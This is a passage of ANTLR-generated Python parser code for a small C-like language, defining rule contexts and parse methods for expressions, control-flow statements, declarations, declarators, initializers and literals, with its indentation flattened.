return self.getTypedRuleContext(SmallCParser.IntegerLiteralContext,0)
def characterLiteral(self):
return self.getTypedRuleContext(SmallCParser.CharacterLiteralContext,0)
def stringLiteral(self):
return self.getTypedRuleContext(SmallCParser.StringLiteralContext,0)
def functionCall(self):
return self.getTypedRuleContext(SmallCParser.FunctionCallContext,0)
def oplevel14(self):
return self.getTypedRuleContext(SmallCParser.Oplevel14Context,0)
def getRuleIndex(self):
return SmallCParser.RULE_expression
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterExpression" ):
listener.enterExpression(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitExpression" ):
listener.exitExpression(self)
def expression(self):
localctx = SmallCParser.ExpressionContext(self, self._ctx, self.state)
self.enterRule(localctx, 54, self.RULE_expression)
try:
self.state = 396
self._errHandler.sync(self);
la_ = self._interp.adaptivePredict(self._input,33,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 389
self.variable()
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 390
self.floatLiteral()
pass
elif la_ == 3:
self.enterOuterAlt(localctx, 3)
self.state = 391
self.integerLiteral()
pass
elif la_ == 4:
self.enterOuterAlt(localctx, 4)
self.state = 392
self.characterLiteral()
pass
elif la_ == 5:
self.enterOuterAlt(localctx, 5)
self.state = 393
self.stringLiteral()
pass
elif la_ == 6:
self.enterOuterAlt(localctx, 6)
self.state = 394
self.functionCall()
pass
elif la_ == 7:
self.enterOuterAlt(localctx, 7)
self.state = 395
self.oplevel14()
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class IfCondContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def IF(self):
return self.getToken(SmallCParser.IF, 0)
def LBRA(self):
return self.getToken(SmallCParser.LBRA, 0)
def expression(self):
return self.getTypedRuleContext(SmallCParser.ExpressionContext,0)
def RBRA(self):
return self.getToken(SmallCParser.RBRA, 0)
def statement(self):
return self.getTypedRuleContext(SmallCParser.StatementContext,0)
def elseCond(self):
return self.getTypedRuleContext(SmallCParser.ElseCondContext,0)
def getRuleIndex(self):
return SmallCParser.RULE_ifCond
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterIfCond" ):
listener.enterIfCond(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitIfCond" ):
listener.exitIfCond(self)
def ifCond(self):
localctx = SmallCParser.IfCondContext(self, self._ctx, self.state)
self.enterRule(localctx, 56, self.RULE_ifCond)
try:
self.enterOuterAlt(localctx, 1)
self.state = 398
self.match(SmallCParser.IF)
self.state = 399
self.match(SmallCParser.LBRA)
self.state = 400
self.expression()
self.state = 401
self.match(SmallCParser.RBRA)
self.state = 402
self.statement()
self.state = 404
self._errHandler.sync(self);
la_ = self._interp.adaptivePredict(self._input,34,self._ctx)
if la_ == 1:
self.state = 403
self.elseCond()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class ElseCondContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def ELSE(self):
return self.getToken(SmallCParser.ELSE, 0)
def statement(self):
return self.getTypedRuleContext(SmallCParser.StatementContext,0)
def getRuleIndex(self):
return SmallCParser.RULE_elseCond
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterElseCond" ):
listener.enterElseCond(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitElseCond" ):
listener.exitElseCond(self)
def elseCond(self):
localctx = SmallCParser.ElseCondContext(self, self._ctx, self.state)
self.enterRule(localctx, 58, self.RULE_elseCond)
try:
self.enterOuterAlt(localctx, 1)
self.state = 406
self.match(SmallCParser.ELSE)
self.state = 407
self.statement()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class WhileCondContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def WHILE(self):
return self.getToken(SmallCParser.WHILE, 0)
def LBRA(self):
return self.getToken(SmallCParser.LBRA, 0)
def expression(self):
return self.getTypedRuleContext(SmallCParser.ExpressionContext,0)
def RBRA(self):
return self.getToken(SmallCParser.RBRA, 0)
def statement(self):
return self.getTypedRuleContext(SmallCParser.StatementContext,0)
def getRuleIndex(self):
return SmallCParser.RULE_whileCond
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterWhileCond" ):
listener.enterWhileCond(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitWhileCond" ):
listener.exitWhileCond(self)
def whileCond(self):
localctx = SmallCParser.WhileCondContext(self, self._ctx, self.state)
self.enterRule(localctx, 60, self.RULE_whileCond)
try:
self.enterOuterAlt(localctx, 1)
self.state = 409
self.match(SmallCParser.WHILE)
self.state = 410
self.match(SmallCParser.LBRA)
self.state = 411
self.expression()
self.state = 412
self.match(SmallCParser.RBRA)
self.state = 413
self.statement()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class DoWhileCondContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def DO(self):
return self.getToken(SmallCParser.DO, 0)
def statements(self):
return self.getTypedRuleContext(SmallCParser.StatementsContext,0)
def WHILE(self):
return self.getToken(SmallCParser.WHILE, 0)
def LBRA(self):
return self.getToken(SmallCParser.LBRA, 0)
def expression(self):
return self.getTypedRuleContext(SmallCParser.ExpressionContext,0)
def RBRA(self):
return self.getToken(SmallCParser.RBRA, 0)
def getRuleIndex(self):
return SmallCParser.RULE_doWhileCond
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterDoWhileCond" ):
listener.enterDoWhileCond(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitDoWhileCond" ):
listener.exitDoWhileCond(self)
def doWhileCond(self):
localctx = SmallCParser.DoWhileCondContext(self, self._ctx, self.state)
self.enterRule(localctx, 62, self.RULE_doWhileCond)
try:
self.enterOuterAlt(localctx, 1)
self.state = 415
self.match(SmallCParser.DO)
self.state = 416
self.statements()
self.state = 417
self.match(SmallCParser.WHILE)
self.state = 418
self.match(SmallCParser.LBRA)
self.state = 419
self.expression()
self.state = 420
self.match(SmallCParser.RBRA)
self.state = 421
self.match(SmallCParser.T__18)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class ForLoopContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def FOR(self):
return self.getToken(SmallCParser.FOR, 0)
def LBRA(self):
return self.getToken(SmallCParser.LBRA, 0)
def expression(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(SmallCParser.ExpressionContext)
else:
return self.getTypedRuleContext(SmallCParser.ExpressionContext,i)
def RBRA(self):
return self.getToken(SmallCParser.RBRA, 0)
def statement(self):
return self.getTypedRuleContext(SmallCParser.StatementContext,0)
def variableDeclaration(self):
return self.getTypedRuleContext(SmallCParser.VariableDeclarationContext,0)
def variable(self):
return self.getTypedRuleContext(SmallCParser.VariableContext,0)
def getRuleIndex(self):
return SmallCParser.RULE_forLoop
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterForLoop" ):
listener.enterForLoop(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitForLoop" ):
listener.exitForLoop(self)
def forLoop(self):
localctx = SmallCParser.ForLoopContext(self, self._ctx, self.state)
self.enterRule(localctx, 64, self.RULE_forLoop)
try:
self.enterOuterAlt(localctx, 1)
self.state = 423
self.match(SmallCParser.FOR)
self.state = 424
self.match(SmallCParser.LBRA)
self.state = 427
token = self._input.LA(1)
if token in [SmallCParser.TYPECHAR, SmallCParser.TYPEFLOAT, SmallCParser.TYPEINT, SmallCParser.TYPEVOID, SmallCParser.CONST]:
self.state = 425
self.variableDeclaration()
elif token in [SmallCParser.IDENTIFIER]:
self.state = 426
self.variable()
else:
raise NoViableAltException(self)
self.state = 429
self.match(SmallCParser.T__18)
self.state = 430
self.expression()
self.state = 431
self.match(SmallCParser.T__18)
self.state = 432
self.expression()
self.state = 433
self.match(SmallCParser.RBRA)
self.state = 434
self.statement()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class VariableDeclarationContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def declaratorInitializer(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(SmallCParser.DeclaratorInitializerContext)
else:
return self.getTypedRuleContext(SmallCParser.DeclaratorInitializerContext,i)
def declarationSpecifier(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(SmallCParser.DeclarationSpecifierContext)
else:
return self.getTypedRuleContext(SmallCParser.DeclarationSpecifierContext,i)
def getRuleIndex(self):
return SmallCParser.RULE_variableDeclaration
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterVariableDeclaration" ):
listener.enterVariableDeclaration(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitVariableDeclaration" ):
listener.exitVariableDeclaration(self)
def variableDeclaration(self):
localctx = SmallCParser.VariableDeclarationContext(self, self._ctx, self.state)
self.enterRule(localctx, 66, self.RULE_variableDeclaration)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 437
self._errHandler.sync(self)
_la = self._input.LA(1)
while True:
self.state = 436
self.declarationSpecifier()
self.state = 439
self._errHandler.sync(self)
_la = self._input.LA(1)
if not ((((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << SmallCParser.TYPECHAR) | (1 << SmallCParser.TYPEFLOAT) | (1 << SmallCParser.TYPEINT) | (1 << SmallCParser.TYPEVOID) | (1 << SmallCParser.CONST))) != 0)):
break
self.state = 441
self.declaratorInitializer()
self.state = 446
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==SmallCParser.COMMA:
self.state = 442
self.match(SmallCParser.COMMA)
self.state = 443
self.declaratorInitializer()
self.state = 448
self._errHandler.sync(self)
_la = self._input.LA(1)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class DeclarationSpecifierContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def typeDeclaration(self):
return self.getTypedRuleContext(SmallCParser.TypeDeclarationContext,0)
def cvQualifier(self):
return self.getTypedRuleContext(SmallCParser.CvQualifierContext,0)
def getRuleIndex(self):
return SmallCParser.RULE_declarationSpecifier
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterDeclarationSpecifier" ):
listener.enterDeclarationSpecifier(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitDeclarationSpecifier" ):
listener.exitDeclarationSpecifier(self)
def declarationSpecifier(self):
localctx = SmallCParser.DeclarationSpecifierContext(self, self._ctx, self.state)
self.enterRule(localctx, 68, self.RULE_declarationSpecifier)
try:
self.state = 451
token = self._input.LA(1)
if token in [SmallCParser.TYPECHAR, SmallCParser.TYPEFLOAT, SmallCParser.TYPEINT, SmallCParser.TYPEVOID]:
self.enterOuterAlt(localctx, 1)
self.state = 449
self.typeDeclaration()
elif token in [SmallCParser.CONST]:
self.enterOuterAlt(localctx, 2)
self.state = 450
self.cvQualifier()
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class CvQualifierContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def CONST(self):
return self.getToken(SmallCParser.CONST, 0)
def getRuleIndex(self):
return SmallCParser.RULE_cvQualifier
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterCvQualifier" ):
listener.enterCvQualifier(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitCvQualifier" ):
listener.exitCvQualifier(self)
def cvQualifier(self):
localctx = SmallCParser.CvQualifierContext(self, self._ctx, self.state)
self.enterRule(localctx, 70, self.RULE_cvQualifier)
try:
self.enterOuterAlt(localctx, 1)
self.state = 453
self.match(SmallCParser.CONST)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class DeclaratorInitializerContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def declarator1(self):
return self.getTypedRuleContext(SmallCParser.Declarator1Context,0)
def initializer(self):
return self.getTypedRuleContext(SmallCParser.InitializerContext,0)
def getRuleIndex(self):
return SmallCParser.RULE_declaratorInitializer
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterDeclaratorInitializer" ):
listener.enterDeclaratorInitializer(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitDeclaratorInitializer" ):
listener.exitDeclaratorInitializer(self)
def declaratorInitializer(self):
localctx = SmallCParser.DeclaratorInitializerContext(self, self._ctx, self.state)
self.enterRule(localctx, 72, self.RULE_declaratorInitializer)
self._la = 0 # Token type
try:
self.state = 467
self._errHandler.sync(self);
la_ = self._interp.adaptivePredict(self._input,41,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 455
self.match(SmallCParser.LBRA)
self.state = 456
self.declarator1()
self.state = 457
self.match(SmallCParser.RBRA)
self.state = 460
_la = self._input.LA(1)
if _la==SmallCParser.T__0:
self.state = 458
self.match(SmallCParser.T__0)
self.state = 459
self.initializer()
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 462
self.declarator1()
self.state = 465
_la = self._input.LA(1)
if _la==SmallCParser.T__0:
self.state = 463
self.match(SmallCParser.T__0)
self.state = 464
self.initializer()
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Declarator1Context(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def declarator1(self):
return self.getTypedRuleContext(SmallCParser.Declarator1Context,0)
def declarator2(self):
return self.getTypedRuleContext(SmallCParser.Declarator2Context,0)
def arrayPart(self):
return self.getTypedRuleContext(SmallCParser.ArrayPartContext,0)
def getRuleIndex(self):
return SmallCParser.RULE_declarator1
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterDeclarator1" ):
listener.enterDeclarator1(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitDeclarator1" ):
listener.exitDeclarator1(self)
def declarator1(self):
localctx = SmallCParser.Declarator1Context(self, self._ctx, self.state)
self.enterRule(localctx, 74, self.RULE_declarator1)
try:
self.state = 477
self._errHandler.sync(self);
la_ = self._interp.adaptivePredict(self._input,43,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 469
self.match(SmallCParser.LBRA)
self.state = 470
self.declarator1()
self.state = 471
self.match(SmallCParser.RBRA)
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 473
self.declarator2()
self.state = 475
self._errHandler.sync(self);
la_ = self._interp.adaptivePredict(self._input,42,self._ctx)
if la_ == 1:
self.state = 474
self.arrayPart()
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Declarator2Context(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def declarator2(self):
return self.getTypedRuleContext(SmallCParser.Declarator2Context,0)
def identifier(self):
return self.getTypedRuleContext(SmallCParser.IdentifierContext,0)
def pointerPart(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(SmallCParser.PointerPartContext)
else:
return self.getTypedRuleContext(SmallCParser.PointerPartContext,i)
def declarator1(self):
return self.getTypedRuleContext(SmallCParser.Declarator1Context,0)
def getRuleIndex(self):
return SmallCParser.RULE_declarator2
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterDeclarator2" ):
listener.enterDeclarator2(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitDeclarator2" ):
listener.exitDeclarator2(self)
def declarator2(self):
localctx = SmallCParser.Declarator2Context(self, self._ctx, self.state)
self.enterRule(localctx, 76, self.RULE_declarator2)
self._la = 0 # Token type
try:
self.state = 497
self._errHandler.sync(self);
la_ = self._interp.adaptivePredict(self._input,46,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 479
self.match(SmallCParser.LBRA)
self.state = 480
self.declarator2()
self.state = 481
self.match(SmallCParser.RBRA)
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 486
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==SmallCParser.T__11:
self.state = 483
self.pointerPart()
self.state = 488
self._errHandler.sync(self)
_la = self._input.LA(1)
self.state = 489
self.identifier()
pass
elif la_ == 3:
self.enterOuterAlt(localctx, 3)
self.state = 491
self._errHandler.sync(self)
_alt = 1
while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
if _alt == 1:
self.state = 490
self.pointerPart()
else:
raise NoViableAltException(self)
self.state = 493
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,45,self._ctx)
self.state = 495
self.declarator1()
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class InitializerContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def LCBRA(self):
return self.getToken(SmallCParser.LCBRA, 0)
def RCBRA(self):
return self.getToken(SmallCParser.RCBRA, 0)
def expression(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(SmallCParser.ExpressionContext)
else:
return self.getTypedRuleContext(SmallCParser.ExpressionContext,i)
def getRuleIndex(self):
return SmallCParser.RULE_initializer
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterInitializer" ):
listener.enterInitializer(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitInitializer" ):
listener.exitInitializer(self)
def initializer(self):
localctx = SmallCParser.InitializerContext(self, self._ctx, self.state)
self.enterRule(localctx, 78, self.RULE_initializer)
self._la = 0 # Token type
try:
self.state = 512
token = self._input.LA(1)
if token in [SmallCParser.LCBRA]:
self.enterOuterAlt(localctx, 1)
self.state = 499
self.match(SmallCParser.LCBRA)
self.state = 508
_la = self._input.LA(1)
if (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << SmallCParser.T__9) | (1 << SmallCParser.T__10) | (1 << SmallCParser.T__11) | (1 << SmallCParser.T__14) | (1 << SmallCParser.T__15) | (1 << SmallCParser.T__16) | (1 << SmallCParser.T__17) | (1 << SmallCParser.LBRA) | (1 << SmallCParser.INTEGER) | (1 << SmallCParser.FLOAT) | (1 << SmallCParser.IDENTIFIER) | (1 << SmallCParser.CHARACTER) | (1 << SmallCParser.STRING))) != 0):
self.state = 500
self.expression()
self.state = 505
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==SmallCParser.COMMA:
self.state = 501
self.match(SmallCParser.COMMA)
self.state = 502
self.expression()
self.state = 507
self._errHandler.sync(self)
_la = self._input.LA(1)
self.state = 510
self.match(SmallCParser.RCBRA)
elif token in [SmallCParser.T__9, SmallCParser.T__10, SmallCParser.T__11, SmallCParser.T__14, SmallCParser.T__15, SmallCParser.T__16, SmallCParser.T__17, SmallCParser.LBRA, SmallCParser.INTEGER, SmallCParser.FLOAT, SmallCParser.IDENTIFIER, SmallCParser.CHARACTER, SmallCParser.STRING]:
self.enterOuterAlt(localctx, 2)
self.state = 511
self.expression()
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class ReturnStmtContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def RETURN(self):
return self.getToken(SmallCParser.RETURN, 0)
def expression(self):
return self.getTypedRuleContext(SmallCParser.ExpressionContext,0)
def getRuleIndex(self):
return SmallCParser.RULE_returnStmt
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterReturnStmt" ):
listener.enterReturnStmt(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitReturnStmt" ):
listener.exitReturnStmt(self)
def returnStmt(self):
localctx = SmallCParser.ReturnStmtContext(self, self._ctx, self.state)
self.enterRule(localctx, 80, self.RULE_returnStmt)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 514
self.match(SmallCParser.RETURN)
self.state = 516
_la = self._input.LA(1)
if (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << SmallCParser.T__9) | (1 << SmallCParser.T__10) | (1 << SmallCParser.T__11) | (1 << SmallCParser.T__14) | (1 << SmallCParser.T__15) | (1 << SmallCParser.T__16) | (1 << SmallCParser.T__17) | (1 << SmallCParser.LBRA) | (1 << SmallCParser.INTEGER) | (1 << SmallCParser.FLOAT) | (1 << SmallCParser.IDENTIFIER) | (1 << SmallCParser.CHARACTER) | (1 << SmallCParser.STRING))) != 0):
self.state = 515
self.expression()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class ArgumentsContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def expression(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(SmallCParser.ExpressionContext)
else:
return self.getTypedRuleContext(SmallCParser.ExpressionContext,i)
def getRuleIndex(self):
return SmallCParser.RULE_arguments
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterArguments" ):
listener.enterArguments(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitArguments" ):
listener.exitArguments(self)
def arguments(self):
localctx = SmallCParser.ArgumentsContext(self, self._ctx, self.state)
self.enterRule(localctx, 82, self.RULE_arguments)
self._la = 0 # Token type
try:
self.state = 527
token = self._input.LA(1)
if token in [SmallCParser.T__9, SmallCParser.T__10, SmallCParser.T__11, SmallCParser.T__14, SmallCParser.T__15, SmallCParser.T__16, SmallCParser.T__17, SmallCParser.LBRA, SmallCParser.INTEGER, SmallCParser.FLOAT, SmallCParser.IDENTIFIER, SmallCParser.CHARACTER, SmallCParser.STRING]:
self.enterOuterAlt(localctx, 1)
self.state = 518
self.expression()
self.state = 523
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==SmallCParser.COMMA:
self.state = 519
self.match(SmallCParser.COMMA)
self.state = 520
self.expression()
self.state = 525
self._errHandler.sync(self)
_la = self._input.LA(1)
elif token in [SmallCParser.RBRA]:
self.enterOuterAlt(localctx, 2)
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class FunctionCallContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def identifier(self):
return self.getTypedRuleContext(SmallCParser.IdentifierContext,0)
def LBRA(self):
return self.getToken(SmallCParser.LBRA, 0)
def arguments(self):
return self.getTypedRuleContext(SmallCParser.ArgumentsContext,0)
def RBRA(self):
return self.getToken(SmallCParser.RBRA, 0)
def getRuleIndex(self):
return SmallCParser.RULE_functionCall
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFunctionCall" ):
listener.enterFunctionCall(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFunctionCall" ):
listener.exitFunctionCall(self)
def functionCall(self):
localctx = SmallCParser.FunctionCallContext(self, self._ctx, self.state)
self.enterRule(localctx, 84, self.RULE_functionCall)
try:
self.enterOuterAlt(localctx, 1)
self.state = 529
self.identifier()
self.state = 530
self.match(SmallCParser.LBRA)
self.state = 531
self.arguments()
self.state = 532
self.match(SmallCParser.RBRA)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class VariableContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def identifier(self):
return self.getTypedRuleContext(SmallCParser.IdentifierContext,0)
def getRuleIndex(self):
return SmallCParser.RULE_variable
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterVariable" ):
listener.enterVariable(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitVariable" ):
listener.exitVariable(self)
def variable(self):
localctx = SmallCParser.VariableContext(self, self._ctx, self.state)
self.enterRule(localctx, 86, self.RULE_variable)
try:
self.enterOuterAlt(localctx, 1)
self.state = 534
self.identifier()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class IdentifierContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def IDENTIFIER(self):
return self.getToken(SmallCParser.IDENTIFIER, 0)
def getRuleIndex(self):
return SmallCParser.RULE_identifier
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterIdentifier" ):
listener.enterIdentifier(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitIdentifier" ):
listener.exitIdentifier(self)
def identifier(self):
localctx = SmallCParser.IdentifierContext(self, self._ctx, self.state)
self.enterRule(localctx, 88, self.RULE_identifier)
try:
self.enterOuterAlt(localctx, 1)
self.state = 536
self.match(SmallCParser.IDENTIFIER)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class PointerContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def getRuleIndex(self):
return SmallCParser.RULE_pointer
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterPointer" ):
listener.enterPointer(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitPointer" ):
listener.exitPointer(self)
def pointer(self):
localctx = SmallCParser.PointerContext(self, self._ctx, self.state)
self.enterRule(localctx, 90, self.RULE_pointer)
try:
self.enterOuterAlt(localctx, 1)
self.state = 538
self.match(SmallCParser.T__11)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class TypeDeclarationContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def TYPECHAR(self):
return self.getToken(SmallCParser.TYPECHAR, 0)
def TYPEFLOAT(self):
return self.getToken(SmallCParser.TYPEFLOAT, 0)
def TYPEINT(self):
return self.getToken(SmallCParser.TYPEINT, 0)
def TYPEVOID(self):
return self.getToken(SmallCParser.TYPEVOID, 0)
def getRuleIndex(self):
return SmallCParser.RULE_typeDeclaration
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTypeDeclaration" ):
listener.enterTypeDeclaration(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTypeDeclaration" ):
listener.exitTypeDeclaration(self)
def typeDeclaration(self):
localctx = SmallCParser.TypeDeclarationContext(self, self._ctx, self.state)
self.enterRule(localctx, 92, self.RULE_typeDeclaration)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 540
_la = self._input.LA(1)
if not((((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << SmallCParser.TYPECHAR) | (1 << SmallCParser.TYPEFLOAT) | (1 << SmallCParser.TYPEINT) | (1 << SmallCParser.TYPEVOID))) != 0)):
self._errHandler.recoverInline(self)
else:
self.consume()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class FloatLiteralContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def FLOAT(self):
return self.getToken(SmallCParser.FLOAT, 0)
def getRuleIndex(self):
return SmallCParser.RULE_floatLiteral
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFloatLiteral" ):
listener.enterFloatLiteral(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFloatLiteral" ):
listener.exitFloatLiteral(self)
def floatLiteral(self):
localctx = SmallCParser.FloatLiteralContext(self, self._ctx, self.state)
self.enterRule(localctx, 94, self.RULE_floatLiteral)
try:
self.enterOuterAlt(localctx, 1)
self.state = 542
self.match(SmallCParser.FLOAT)
except RecognitionException as re:
localctx.exception = re
